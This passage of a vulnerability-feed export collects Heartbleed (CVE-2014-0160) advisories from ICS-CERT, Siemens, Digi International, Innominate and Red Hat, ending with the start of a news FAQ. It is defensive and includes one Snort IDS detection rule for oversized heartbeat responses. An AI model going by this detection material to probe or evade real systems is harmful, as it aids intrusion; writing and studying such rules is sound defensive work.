download those versions from vendors.\n\nUncovering the existence of the OpenSSL vulnerability is difficult through network monitoring unless it can be determined that a device or application is being actively exploited. To make this effort even more difficult, researchers have suggested some methods to obfuscate attack traffic. Considering these challenges, a few criteria can be used to possibly determine if a host is likely vulnerable. Unfortunately, this cannot be used to ascertain if the host is not vulnerable unless it was produced or last updated before March 2012. The criteria are as follows:\n\n * Host is using OpenSSL (unknown version);\n * No patching has been done since April 4th;\n * Host has been produced or updated since March 2012; and\n * Heartbeat extension is supported (packet filters can be used to detect heartbeat messages).\n\nIt should also be noted that capturing network traffic from an ICS environment can cause increases in network delays that may result in process malfunction.\n\n## DETECTION SIGNATURES\n\nContact equipment vendors for specific mitigation information as the implementations may vary. In addition, IDS signatures are available that may provide awareness of an attack of this nature occurring. An example of these rule sets can be found hereh:\n\nalert tcp any [!80,!445] -> any [!80,!445] (msg:\"FOX-SRT - Suspicious - SSLv3 Large Heartbeat Response\"; flow:established,to_client; content:\"|18 03 00|\"; depth: 3; byte_test:2, >, 200, 3, big; byte_test:2, <, 16385, 3, big; threshold:type limit, track by_src, count 1, seconds 600; reference:cve,2014-0160; classtype:bad-unknown; sid: 1000000; rev:4;)\n\nAdditional Snort signatures have been provided by the FBI, Mitigation against Open Secure Socket Layer Heartbeat Extension Vulnerability, at:\n\nhttp://ics-cert.us-cert.gov/sites/default/files/documents/FBI%20Private%20Industry%20Notice-140416-002.pdf\n\nSnort community rules can be found at:\n\n<http://www.snort.org/snort-rules/#community>.\n\nAdditional indicators of compromise are available on the Control Systems compartment of the US-CERT secure portal for owners and operators of critical infrastructure. ICS-CERT encourages U.S. asset owners and operators to join the Control Systems compartment of the US\u2011CERT secure portal. Send your name, email address, and company affiliation to \n[ics-cert@hq.dhs.gov](<mailto:ics-cert@hq.dhs.gov>).\n\n**NOTE: ICS-CERT has not tested the validity or efficacy of these rule sets and cautions users to thoroughly test these solutions before implementing them into production environments!**\n\n## USE OF SPECIALIZED SEARCH ENGINES\n\nEven prior to the discovery of the OpenSSL vulnerability, Internet facing devices have been a serious concern over the past few years with remote access demands giving way to insecure or vulnerable configurations. Tools; such as SHODAN, Google, and other search engines; enable researchers and adversaries to easily discover and identify a variety of ICS devices that were not intended to be Internet facing. This is due in part to ICS terminology and search terms that have become widely available because of an increasing public body of knowledge with detailed ICS information. Adding to the threat landscape is SHODAN\u2019s linkages to exploit databases as well as continuous scanning and cataloguing of devices with emerging vulnerabilities such as DNP3 and OpenSSL. The availability of public information coupled with the aforementioned tools, lowers the level of knowledge required to successfully locate Internet facing control systems. In many cases, these devices have not been configured with adequate authentication mechanisms, thereby further increasing the chances of both opportunistic and targeted attempts to directly access these components.\n\nTools such as SHODAN may be proactively used by owners, operators, and security personnel to audit their networks and devices to locate Internet facing control system devices that may be susceptible to compromise. Asset owners are encouraged to query various search engines using the vendor product, model, and version of a device, to determine if their IP address block is found within the search results. If control systems devices are found using these tools, asset owners should take the necessary steps to remove these devices from direct or unsecured Internet access as soon as possible.\n\nAs tools and adversary capabilities advance, ICS-CERT expects that exposed systems will be more effectively discovered, and targeted. It has become more important than ever for asset owners and operators to audit their network configurations and properly install their ICS devices behind patched VPNs or firewalls.\n\nICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.i\n * Locate control system networks and devices behind firewalls, and isolate them from the business network.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to taking defensive measures.\n\nICS-CERT also provides a recommended practices section for control systems on the ICS-CERT web site (http://ics-cert.us-cert.gov). Several recommended practices are available for reading or download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nOrganizations that observe any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. https://www.openssl.org/news/secadv_20140407.txt, web site last accessed May 15, 2014.\n * b. http://heartbleed.com/, web site last accessed May 15, 2014.\n * c. CWE-125: Out of Bounds Read, https://cwe.mitre.org/data/definitions/125.html, web site last accessed May 15, 2014.\n * d. CVE, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, web site last accessed May 15, 2014.\n * e. SANS OpenSSL Vulnerability, http://digital-forensics.sans.org/blog/2014/04/10/heartbleed-links-simulcast-etc/, web site last accessed May 15, 2014.\n * f. CVE, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed May 15, 2014.\n * g. NVD, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed May 15, 2014.\n * h. IDS signature examples, http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/, web site last accessed May 15, 2014.\n * i. ICS-CERT ALERT, http://ics-cert.us-cert.gov/alerts/ICS-ALERT-10-301-01, web site last accessed May 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "modified": "2018-08-27T00:00:00", "published": "2014-05-15T00:00:00", "id": "ICSA-14-135-05", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-135-05", "title": "OpenSSL Vulnerability", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-23T22:47:42", "bulletinFamily": "info", "description": "## OVERVIEW\n\nThis updated advisory is a follow-up to the updated advisory titled ICSA-14-105-03A Siemens Industrial Products OpenSSL Heartbleed Vulnerability that was published April 29, 2014, on the NCCIC/ICS-CERT web site.\n\nSiemens reported to ICS-CERT a list of products affected by the OpenSSL vulnerability (known as \u201cHeartbleed\u201d). Joel Langill of Infrastructure Defense Security Services reported to ICS-CERT and Siemens the OpenSSL vulnerability affecting the S7-1500.\n\n### **\\--------- Begin Update B Part 1 of 3 --------**\n\nSiemens has produced an update and Security Advisory (SSA-635659) that mitigates this vulnerability in each of the affected products listed below.\n\n### **\\--------- End Update B Part 1 of 3 ----------**\n\nThis vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\n### **\\--------- Begin Update **B** Part 2 of 3 --------**\n\nThe following Siemens products are affected:\n\n * eLAN-8.2 eLAN prior to 8.3.3 (affected when RIP is used\u2014update available),\n * WinCC OA only V3.12 (always affected\u2014update available),\n * S7-1500 V1.5 (affected when HTTPS active\u2014update available),\n * CP1543-1 V1.1 (affected when FTPS active\u2014update available), and\n * APE 2.0 (affected when SSL/TLS component is used in customer implementation\u2014update available).\n\n### **\\--------- End Update B Part 2 of 3 ----------**\n\n## IMPACT\n\nA successful \u201cHeartbleed\u201d exploit of the affected products by an attacker with network access could allow attackers to read sensitive data (to include private keys and user credentials) from the process memory.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSiemens is a multinational company headquartered in Munich, Germany.\n\nThe affected Siemens industrial products are for process and network control and monitoring in critical infrastructure sectors such as Chemical, Critical Manufacturing, Energy, Food and Agriculture, and Water and Wastewater Systems.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### BUFFER ERRORSa\n\nThe Heartbleed vulnerability could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal secrets like transmitted data, passwords, or private keys.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nThe attacker must have network access to the affected devices to exploit this vulnerability. Siemens recommends operating all products except perimeter devices only within trusted networks.\n\n### **\\--------- Begin Update B Part 3 of 3 --------**\n\nSiemens provides updates for the following products:\n\n * eLAN-8.2. To obtain the update to Version 8.3.3, submit a support request online at:\n\n<http://www.siemens.com/automation/support-request>\n\n * WinCC OA V3.12. The update for WinCC OA 3.12 can be obtained here (login required):\n\n[https://portal.etm.at/index.php?option=com_content&view=category&id=65&layout=blog&Itemid=80](<https://portal.etm.at/index.php?option=com_content&view=category&id=65&layout=blog&Itemid=80>)\n\n * CP-1543-1 V1.1. The update for CP-1543 V1.1 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/92417421>\n\n * APE 2.0. The update for APE can be obtained here:\n\n<http://www.ruggedcom.com/support/appnotes/>\n\n * S7-1500 V1.5. The update for S7-1500 V1.5 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/67295862/133100>\n\n * S7-1500 V1.5. The update for S7-1500 Failsafe V1.5 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/87493352/133100>\n\n### **\\--------- End Update B Part 3 of 3 ----------**\n\nSiemens provides specific advice for mitigating risk in each of the affected products in SSA\u2011635659, which can be found at their web site at the following location:\n\n<http://www.siemens.com/cert/advisories>\n\nThe researcher suggests if HTTPS is not needed to disable it until a patch is available and applied to the vulnerable product/service.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed April 15, 2014.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed April 15, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed April 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "modified": "2018-09-06T00:00:00", "published": "2014-05-20T00:00:00", "id": "ICSA-14-105-03B", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-105-03B", "title": "Siemens Industrial Products OpenSSL Heartbleed Vulnerability (Update B)", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-23T22:48:03", "bulletinFamily": "info", "description": "## OVERVIEW\n\nDigi International has identified five products that are vulnerable to the OpenSSL Heartbleed bug. Digi International has produced downloadable firmware upgrade versions that mitigate this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe following Digi International products are affected:\n\n * ConnectPort LTS,\n * ConnectPort X2e,\n * Digi Embedded Linux 5.9,\n * Digi Embedded Yocto 1.4, and\n * Wireless Vehicle Bus Adapter (WVA).\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS Heartbeat extension can be used to reveal up to 64kB of memory on a connected device. An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nDigi International is a US-based company located in Minnetonka, Minnesota. It maintains offices in Europe, Middle East, Africa, Asia, and Latin America.\n\nDigi International is a provider of machine-to-machine (M2M) cloud products and services, using both wired and wireless technologies. Digi International acquired Etherios in 2013. Digi International uses vulnerable versions of OpenSSL.\n\nThe affected Digi International products are wireless web/mesh-based SCADA communication systems. According to Digi International, their products are deployed across several sectors including Commercial Facilities, Communications, Critical Manufacturing, Energy, Transportation Systems, and others.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nThe Heartbleed bug could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal data like transmitted data, passwords, or private keys.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a moderate skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nDigi International published a Security Notice OpenSSL \u201cHeartbleed\u201d on April 14, 2014, updated on April 18, 2014, at the following URL:\n\n<http://www.digi.com/support/kbase/kbaseresultdetl?id=3564>\n\nRecommended firmware updates for most vulnerable Digi International devices are located on the Digi International technical support site, at URL:\n\n[www.digi.com/support](<http://www.digi.com/support>)\n\nThe Digi OpenSSL Heartbleed fix for Digi Embedded Yocto 1.4 is available in the github repositories, and instructions for this update are at URL:\n\n<http://www.digi.com/support/kbase/kbaseresultdetl?id=3566>\n\nAll products vulnerable to the OpenSSL Heartbleed bug can also be accessed via Device Cloud by Etherios. Device Cloud is a management platform providing the capability to perform device management functions to installed base of devices regardless of location.\n\nDigi International also recommends subscribing to the RSS feed on the support site for Digi International products to get immediate notice of any new firmware or document releases specific to Digi International product updates.\n\nDigi International recommends the following defensive measures:\n\n * Update Firmware. The recommended fix for Heartbleed for Digi International devices is to update to a fixed firmware version update, available on the [www.digi.com/support](<http://www.digi.com/support>) web site.\n * Change Certificates. If HTTPS service is enabled, and the user has deployed a private key and certificate to the web interface (highly recommended), change the certificate at this time and update to an unaffected firmware version prior to changing the private key certificates.\n * Change Passwords. If HTTPS service is enabled, change all passwords associated with the affected device, including device user passwords. If using TACACS or RADIUS, change the user passwords as well as the shared secret. If VPN is used in this configuration, change the passwords and/or tokens.\n * Disable the Web Service. Disabling the HTTPS service and still maintaining manageability on the device can be accomplished in a number of ways. Manage the device through a command line service like SSH, or use a Device Cloud account to centrally manage all the devices. Further, if HTTPS service is enabled and on a public IP on the Internet, restrict or disable the HTTPS web interface to specific IPs.\n * Check Services. If any HTTPS services have been implemented within Python, please evaluate the code and make sure that it is not impacted. If shell scripting uses the OpenSSL commands, please ensure to mitigate the Heartbeat TLS extension.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed May 08, 2014.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed May 08, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N , web site last accessed May 08, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "modified": "2018-09-06T00:00:00", "published": "2014-05-08T00:00:00", "id": "ICSA-14-128-01", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-128-01", "title": "Digi International OpenSSL Vulnerability", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-23T22:47:47", "bulletinFamily": "info", "description": "## OVERVIEW\n\nResearcher Bob Radvanovsky of Infracritical has notified NCCIC/ICS-CERT that Innominate has released a new firmware version that mitigates the OpenSSL HeartBleed vulnerability in the mGuard products.\n\n### **\\--------- Begin Update A Part 1 of 4 --------**\n\nPhoenix Contact branded devices are not likely to be affected, but Phoenix Contact has released a new firmware version to alleviate concern about this vulnerability affecting its products.\n\n### **\\--------- End Update A Part 1 of 4 ----------**\n\nThis vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\n### **\\--------- Begin Update A Part 2 of 4 --------**\n\nThe following mGuard versions are affected:\n\n * mGuard firmware Versions 8.0.0 and 8.0.1\n\nmGuard firmware versions prior to 8.0.0 whether running on Innominate, Phoenix Contact, or other brands of devices are NOT affected.\n\n### **\\--------- End Update A Part 2 of 4 ----------**\n\n## IMPACT\n\nmGuard firmware Versions 8.0.0 and 8.0.1 use the OpenSSL cryptographic library and transport layer security (TLS) implementation Version 1.0.1, which is known to be vulnerable to the HeartBleed vulnerability.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND \n\n### **\\--------- Begin Update A Part 3 of 4 --------**\n\nInnominate is a German-based company that sells products worldwide through its international partners. Innominate was acquired by Phoenix Contact in 2008.\n\n### **\\--------- End Update A Part 3 of 4 ----------**\n\nThe affected products, the mGuard family of products, are industrial security routers. They can be found in many critical infrastructure sectors, including Communications, Healthcare and Public Health, and Critical Manufacturing.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nBecause of the unpredictable memory layout of HTTPS communication, it is possible that the private key of the mGuard web graphic user interface could be disclosed. An attacker could use this key to impersonate the authenticated user and perform a man-in-the-middle attack.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nAll users of the affected mGuard firmware Versions 8.0.0 and 8.0.1 should upgrade to mGuard firmware Version 8.0.2. Innominate recommends users update SSL keys on the affected products after upgrade. The mGuard firmware Version 8.0.2 provides a combined function to replace both the HTTPS and SSH keys.\n\nFor more information regarding this vulnerability and specific instructions on how to install the latest firmware version, please see the Innominate Security Advisory published April 11, 2014, at the following location:\n\n<http://www.innominate.com/data/downloads/software/innominate_security_advisory_20140411_001_en.pdf>\n\n### **\\--------- Begin Update A Part 4 of 4 --------**\n\nPhoenix Contact branded devices are not vulnerable to this issue, as they are using mGuard firmware Version 7.5 that is not affected by HeartBleed. Only mGuard firmware Versions 8.0.0 and 8.0.1 are affected. Phoenix Contact has posted the 8.0.2 firmware patch release on its web site:\n\n<https://www.phoenixcontact.com/mguardsecurity>\n\n### **\\--------- End Update A Part 4 of 4 ----------**\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed April 15, 2014.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed April 15, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed April 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "modified": "2018-09-06T00:00:00", "published": "2014-04-17T00:00:00", "id": "ICSA-14-105-02A", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-105-02A", "title": "Innominate mGuard OpenSSL HeartBleed Vulnerability (Update A)", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:45:42", "bulletinFamily": "unix", "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n", "modified": "2018-06-06T20:24:06", "published": "2014-04-08T04:00:00", "id": "RHSA-2014:0376", "href": "https://access.redhat.com/errata/RHSA-2014:0376", "type": "redhat", "title": "(RHSA-2014:0376) Important: openssl security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-13T18:45:46", "bulletinFamily": "unix", "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: a subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nImportant: This update is an emergency security fix being provided outside\nthe scope of the published support policy for Red Hat Enterprise\nVirtualization listed in the References section. In accordance with the\nsupport policy for Red Hat Enterprise Virtualization, Red Hat Enterprise\nVirtualization Hypervisor 3.2 will not receive future security updates.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects this issue.\n", "modified": "2018-06-07T08:59:36", "published": "2014-04-10T04:00:00", "id": "RHSA-2014:0396", "href": "https://access.redhat.com/errata/RHSA-2014:0396", "type": "redhat", "title": "(RHSA-2014:0396) Important: rhev-hypervisor6 security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-13T18:46:17", "bulletinFamily": "unix", "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll users of Red Hat Storage are advised to upgrade to these updated\npackages, which contain a backported patch to correct this issue. For the\nupdate to take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\n", "modified": "2015-04-24T14:20:43", "published": "2014-04-08T04:00:00", "id": "RHSA-2014:0377", "href": "https://access.redhat.com/errata/RHSA-2014:0377", "type": "redhat", "title": "(RHSA-2014:0377) Important: openssl security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "thn": [{"lastseen": "2018-01-27T09:17:11", "bulletinFamily": "info", "description": "[](<https://4.bp.blogspot.com/-svp9PF6wRBU/U0zgP6p7T4I/AAAAAAAAbOU/05vHzW4cmI4/s1600/heartbleed.png>)\n\n_**Heartbleed**_ \u2013 I think now it\u2019s not a new name for you, as every informational website, Media and Security researchers are talking about probably the biggest Internet vulnerability in recent history. It is a critical bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allows attackers to read portions of the affected server\u2019s memory, potentially revealing users data, that the server did not intend to reveal.\n\n \n\n\nAfter the story broke online, websites around the world flooded with the heartbleed articles, explaining how it works, how to protect, and exactly what it is. Yet many didn\u2019t get it right. So based on the queries of Internet users, we answered some frequently asked questions about the bug.\n\n \n\n\n**1.) IS HEARTBLEED A VIRUS?**\n\nAbsolutely NO, It's not a virus. As described in our previous [article](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>), The Heartbleed bug is a vulnerability resided in TLS heartbeat mechanism built into certain versions of the popular open source encryption standard OpenSSL, a popular version of the Transport Layer Security (TLS) protocol.\n\n \n\n\n**2.) HOW IT WORKS?**\n\nFor SSL to work, your computer needs to communicate to the server via sending 